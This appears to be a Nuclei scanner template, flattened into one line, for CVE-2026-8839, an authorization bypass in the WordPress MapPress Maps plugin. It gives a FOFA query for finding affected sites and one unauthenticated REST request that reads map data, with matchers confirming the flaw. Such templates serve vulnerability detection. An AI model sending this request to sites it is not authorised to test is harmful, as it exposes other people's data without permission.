id: CVE-2026-8839 info: name: WordPress MapPress Maps <= 2.96.6 - Unauthenticated IDOR author: 0x_Akoko severity: medium description: | MapPress Maps for WordPress <= 2.96.6 contains an authorization bypass caused by missing ownership verification in REST API routes, letting unauthenticated attackers read any map data and authenticated contributors modify any map, exploit requires crafted API requests impact: | Unauthenticated attackers can read sensitive map data; authenticated contributors can modify or delete any map, risking data exposure and unauthorized modifications. remediation: | Update to the latest version beyond 2.96.6. reference: - https://plugins.trac.wordpress.org/browser/mappress-google-maps-for-wordpress/trunk/mappress_api.php - https://nvd.nist.gov/vuln/detail/CVE-2026-8839 - https://wordpress.org/plugins/mappress-google-maps-for-wordpress/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2026-8839 epss-score: 0.01018 epss-percentile: 0.59785 cwe-id: CWE-639 metadata: verified: true max-request: 1 fofa-query: body="wp-content/plugins/mappress-google-maps-for-wordpress" tags: cve,cve2026,wordpress,wp-plugin,mappress,idor,exposure,wp http: - raw: - | GET /wp-json/mapp/v1/maps/1 HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains_all(body, "\"mapid\"", "\"pois\"", "\"center\"")' condition: and # digest: 4b0a00483046022100937712481ec4cdc1e0f0240e478b847fce49485a4e8b5640add54c06154cf73102210081e4c29e5a57a7793868cbeadd72a025adff44d062386fcc79579c21d4aed494:922c64590222798bb761d5b6d8e72950